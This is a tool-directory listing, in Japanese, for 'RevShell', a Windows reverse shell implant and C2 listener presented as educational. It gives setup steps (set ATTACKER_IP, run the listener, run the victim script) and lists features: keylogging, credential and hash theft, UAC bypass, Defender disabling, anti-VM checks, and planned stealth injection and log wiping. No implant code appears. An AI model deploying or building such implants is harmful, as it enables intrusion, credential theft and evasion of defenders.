Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RevShell — Windows リバースシェルインプラントの進化を示す包括的な教育用リポジトリ。単純な概念実証(v1.0)から、150以上のコマンドを備えた本格的なポストエクスプロイテーションエージェント(v3.5)までをカバー。C2リスナー、詳細な技術文書、インシデントレスポンストレーニング用のユニバーサルクリーナーツールを含む。 | Kitploit
ツール/GitHubGitHub/dragon56yt/revshell
特権昇格永続化メカニズム横移動データ流出ポストエクスプロイトマルウェア分析ペネトレーションテストコマンド&コントロール学習と教育レッドチーミングペイロード開発
GitHub
22ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
dragon56yt/revshell

RevShell

Windows リバースシェルインプラントの進化を示す包括的な教育用リポジトリ。単純な概念実証(v1.0)から、150以上のコマンドを備えた本格的なポストエクスプロイテーションエージェント(v3.5)までをカバー。C2リスナー、詳細な技術文書、インシデントレスポンストレーニング用のユニバーサルクリーナーツールを含む。

リポジトリを見るウェブサイト

🔥 RevShell Project — Advanced Windows Reverse Shell

root@kitploit:~
██▀███   ▓█████  ██▒   █▓   ██████  ██░ ██  ▓█████  ██▓     ██▓    
▓██ ▒ ██▒▓█   ▀ ▓██░   █▒ ▒██    ▒ ▓██░ ██▒ ▓█   ▀ ▓██▒    ▓██▒    
▓██ ░▄█ ▒▒███   ▓██  █▒░  ░ ▓██▄   ▒██▀▀██░ ▒███   ▒██░    ▒██░    
▒██▀▀█▄  ▒▓█  ▄  ▒██ █░░    ▒   ██▒░▓█ ░██  ▒▓█  ▄ ▒██░    ▒██░    
░██▓ ▒██▒░▒████▒  ▒▀█░    ▒██████▒▒░▓█▒░██▓ ░▒████▒░██████▒░██████▒
░ ▒▓ ░▒▓░░░ ▒░ ░  ░ ▐░    ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒ ░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
  ░▒ ░ ▒░ ░ ░  ░  ░ ░░    ░ ░▒  ░ ░ ▒ ░▒░ ░  ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
  ░░   ░    ░       ░░    ░  ░  ░   ░  ░░ ░    ░     ░ ░     ░ ░   
   ░        ░  ░     ░          ░   ░  ░  ░    ░  ░    ░  ░    ░  ░
                    ░                                              

📖 概要

RevShell は、Windows のリバースシェルが単純なプルーフ・オブ・コンセプトから完全装備のポストエクスプロイテーションエージェントへと進化する過程を示す、包括的な教育プロジェクトです。プロジェクトは 3 つのメジャーバージョンで構成され、各バージョンは前のバージョンを基に、機能の向上、ステルス性の改善、高度なテクニックを追加しています。

このリポジトリは、サイバーセキュリティ教育、正規の侵入テスト、防御研究専用です。すべてのコードは学習目的で現状のまま提供されます。


📁 リポジトリ構造

root@kitploit:~
.
├── v1.0/
│ ├── README.md # v1.0 ユーザーガイド
│ ├── TECHNICAL.md # v1.0 技術詳細
│ ├── listener.py # C2 リスナー(攻撃者側)
│ └── victim_win.py # インプラント(被害者側)
│
├── v2.0/
│ ├── README.md # v2.0 ユーザーガイド
│ ├── TECHNICAL.md # v2.0 技術詳細
│ ├── listener.py # 強化版 C2 リスナー
│ ├── victim_win.py # 40+ コマンドのインプラント
│ └── victim_win_ADMIN.py # 上記+自動昇格
│
└── v3.5/
├── README.md # v3.5 ユーザーガイド(準備中)
├── TECHNICAL.md # v3.5 技術詳細(準備中)
├── listener.py # 高度なリスナー(RC4 暗号化)
├── victim_win.py # 150+ コマンドのフルインプラント
└── victim_win_ADMIN.py # フルインプラント+管理者機能


🔄 バージョン進化


🎯 使用目的

このプロジェクトは以下を目的としています。

  • サイバーセキュリティの学生:リバースシェル、C2 通信、ポストエクスプロイテーション技術を学ぶため。
  • ペネトレーションテスター:正規の契約において柔軟で文書化されたインプラントが必要な場合。
  • ブルーチーム / 防御者:攻撃ツールを理解し、より優れた検知ルールを構築するため。
  • CTF プレイヤー:Windows のチャレンジ向けにカスタマイズ可能なリバースシェルを必要とする場合。

⚖️ 法的免責事項(重要 — 注意深くお読みください)

このソフトウェアは教育および研究目的でのみ提供されます。

1. 許可なき使用 = 違法行為

このソフトウェアを使用して、明示的かつ書面による所有者の許可なく、いかなるコンピュータシステム、ネットワーク、またはデバイスにアクセス、監視、または制御することは、以下の法律に違反します。

  • コンピュータ詐欺及び悪用取締法 (CFAA) — 18 U.S.C. § 1030(米国)
  • 一般データ保護規則 (GDPR) — EU 規則 2016/679
  • 1990 年コンピュータ濫用法(英国)
  • カナダ刑法 — 第 342.1 条 / 第 430 条
  • 2001 年サイバー犯罪法(オーストラリア)
  • 2000 年情報技術法(インド)
  • そして事実上すべての国の類似法。

罰則には以下が含まれる可能性があります:

  • 高額の罰金(数十万ドル/ユーロ以上)
  • 禁固刑(管轄区域により最大 10〜20 年)
  • 永久的な前科
  • 影響を受けた当事者からの民事訴訟

2. 許可された使用のみ

以下のシナリオでのみこのソフトウェアを使用できます。

  • 自分が所有し管理する個人システム上。
  • 隔離された実験環境(本番システムへのネットワークアクセスがない仮想マシン)。
  • 署名済みの法的契約と明確な作業範囲がある正規の侵入テストの一環として。
  • 制御され監督された環境内での学術研究のため。

3. 無保証

本ソフトウェアは「現状のまま」提供され、明示または黙示を問わず、商品性、特定目的への適合性、および非侵害の保証を含むがこれらに限定されない、いかなる種類の保証もありません。いかなる場合においても、著作者または著作権者は、契約行為、不法行為、またはそれ以外の行為に基づくかどうかにかかわらず、本ソフトウェアまたはその使用もしくはその他の取引に起因または関連するいかなる請求、損害、またはその他の責任についても責任を負いません。

4. ユーザーの責任

本ソフトウェアをダウンロード、コピー、インストール、または使用することにより、あなたが自身の行動に対して単独で責任を負うことに同意したものとみなします。著作者および貢献者は、本ソフトウェアの使用に起因するいかなる誤用、損害、または法的結果についても一切の責任を負いません。

意図した使用が合法かどうか不明な場合は、有資格の弁護士に相談してから進めてください。

5. 教育目的の声明

このプロジェクトで実証されている技術(リバースシェル、永続化、資格情報収集、権限昇格)は、サイバーセキュリティ分野では一般的な知識であり、以下の目的でここに文書化されています。

  • 防御者が攻撃者の方法論を理解できるように教育する。
  • 学生に参照実装を提供する。
  • 検知および対応能力の管理されたテストを可能にする。

攻撃の仕組みを理解することは、効果的な防御を構築するために不可欠です。 このプロジェクトは、透過的でコメントが充実したコードを提供し、研究・分析可能にすることで、その目標に貢献します。


🔗 バージョン別クイックリンク

v1.0 — 基本リバースシェル

  • 機能: XOR 暗号化、ファイルアップロード/ダウンロード、steal コマンド、レジストリ永続化。
  • ファイル: v1.0/
  • ドキュメント: README (v1.0) | TECHNICAL (v1.0)

v2.0 — 拡張ポストエクスプロイテーション

  • 機能: +30 の新コマンド、複数方式の永続化、キーロガー、ブラウザ情報収集、WiFi パスワード、権限昇格チェック。
  • ファイル: v2.0/
  • ドキュメント: README (v2.0) | TECHNICAL (v2.0)
  • 管理者バリアント: victim_win_ADMIN.py — 同じ機能 + 自動 UAC バイパス(起動時に昇格を要求)。

v3.5 — 高度な C2 エージェント

  • 機能: RC4 暗号化(nonce 付き)、ビーコン ジッター、アンチ VM、偽装 GUI、150+ コマンド、ポートフォワーディング、画面/マイク録画、管理者バックドア、自己破壊。
  • ファイル: v3.5/
  • ドキュメント: README (v3.5) | TECHNICAL (v3.5)
  • 管理者バリアント: victim_win_ADMIN.py — フルインプラント + 統合自動昇格 + 20 以上の管理者専用コマンド。

🛠️ 基本的な使い方(全バージョン共通)

1. 攻撃者の IP を設定する

被害者スクリプト (victim_win.py) を編集し、以下を設定します:

root@kitploit:~
ATTACKER_IP = "your.ip.here"
2. リスナーを起動する(攻撃者マシン)
root@kitploit:~
python listener.py
3. 被害者スクリプトを展開する(ターゲットマシン)
root@kitploit:~
python victim_win.py
接続が確立されると、コマンドを入力できる shell> プロンプトが表示されます。help と入力すると、そのバージョンで使用可能なコマンドが表示されます。

🚀 将来のロードマップ

最終版として v4.0 を作成する予定で、以下の変更と改善を予定しています。

  • マルチハンドラー C2 リスナー
    複数の同時セッションを管理できるように再設計されたリスナー。新しい組み込みコマンド(:sessions、:interact、:broadcast、:kill、:back)により、オペレーターは被害者を切り替えたり、すべてのアクティブなインプラントに同時にコマンドを送信できるようになります。

  • DLL ペイロード生成
    Nuitka を使用して Python エージェントをネイティブ Windows DLL にコンパイルし、正規プロセス(explorer.exe、svchost.exe)へのリフレクティブインジェクションを可能にします。これにより、可視の python.exe プロセスが排除され、ステルス性が大幅に向上します。

  • 既知の制限事項の完全解決
    v3.5 のすべての制限に対処します:

    • データ流出時のファイルサイズ制限の撤廃(steal、download_dir)。
    • 現在 PowerShell に依存しているすべてのコマンドのフォールバックメカニズム。
    • SeDebugPrivilege の自動取得による信頼性の高い LSASS ダンプ。
    • PowerShell を使わず winmm.dll による直接マイク録音。

これらの拡張により、RevShell は高度なレッドチーム演習や防御者訓練に適したプロフェッショナルグレードの教育用 C2 フレームワークに変貌します。


📚 学習リソース

  • OWASP Reverse Shell Cheat Sheet

  • MITRE ATT&CK — Command and Control

  • Windows Internals — Persistence Mechanisms

  • Python Socket Programming

📄 ライセンス

このプロジェクトは
Apache License 2.0 の下でライセンスされています。

ライセンスのコピーは以下から入手できます:
https://www.apache.org/licenses/LICENSE-2.0


著作権

Copyright (c) 2026 Dragon56YT


概要(インフォーマル)

このソフトウェアは、Apache 2.0 ライセンスの条件のもとで自由に使用、変更、配布できます。

以下のことが可能です:

  • 個人、教育、または商用目的での使用
  • 変更および配布
  • プロプライエタリまたはクローズドソースプロジェクトへの組み込み

ただし、以下の条件があります:

  • ライセンスのコピーを含めること
  • 著作権および帰属表示を保持すること
  • 変更版を再配布する場合は、重要な変更を文書化すること

免責事項

本ソフトウェアは「現状のまま」提供され、明示または黙示を問わず、いかなる種類の保証または条件もありません。

著作者は、本ソフトウェアの使用に起因するいかなる損害、誤用、または結果についても責任を負いません。


重要なお知らせ

このプロジェクトは、セキュリティ研究および教育目的のみを意図しています。

ユーザーは、管轄区域の該当法令に従う責任を単独で負います。

明示的な許可なくコンピュータシステム、データ、またはネットワークに不正にアクセスすることは違法です。


倫理的な使用

このツールは、以下の環境でのみ使用する必要があります。

  • 正規の侵入テスト環境
  • セキュリティ研究ラボ
  • 明示的な許可を得た管理された教育環境

許可のない使用は固く禁じられています。

ツールをダウンロード
機能v1.0v2.0v3.5
暗号化XOR (1 バイト)XOR (1 バイト)RC4 + nonce + SHA‑256
永続化レジストリのみレジストリ + タスク + スタートアップレジストリ + タスク + スタートアップ + WMI + SYSTEM
コマンド数840+150+
ファイル転送✅✅✅ + ディレクトリダウンロード
キーロガー❌✅✅
スクリーンショット❌✅✅ + 画面録画
ブラウザ情報収集❌✅✅
WiFi パスワード❌✅✅
権限昇格チェック❌✅✅
管理者コマンド❌disable_defender, dump_hashes+20 の管理者コマンド (RDP, UAC, ファイアウォール, BSOD など)
アンチ VM / サンドボックス❌❌✅
偽装 GUI❌❌✅
ビーコン ジッター❌❌✅
ポートフォワーディング❌❌✅
自己破壊❌❌✅ (autodestroy)
自動昇格 (管理者)❌❌ (別バージョン)✅ (統合)
  • WIA/ffmpeg が利用できない場合の追加のウェブカメラキャプチャ方法。
  • イベントログやフォレンジック痕跡を徹底的に消去する改善された autodestroy。
  • 信頼性の低いネットワーク向けの設定可能なタイムアウトと指数バックオフ。
  • アンチ VM / サンドボックスチェックの削除
    v3.5 のアンチ VM ルーチンは優れた学習演習として機能しましたが、実際には問題が発生しています。正規のハードウェアで誤った VM 検出を引き起こしたり、高い信頼性でアンチウイルスのヒューリスティックをトリガーしたりする可能性があり、ツールの使用が想定される管理された教育環境では不要です。v4.0 ではすべての VM 検出ロジックを削除し、インプラントをより軽量で互換性が高く、シグネチャベースの検出を受けにくくします。

  • クロスプラットフォーム Linux エージェント
    Windows 版が完成した後、専用の Linux インプラントを開発し、機能面での同等性(暗号化 C2、cron/systemd による永続化、システム列挙、SSH 鍵、bash 履歴、クラウド認証情報のネイティブ収集)を実現します。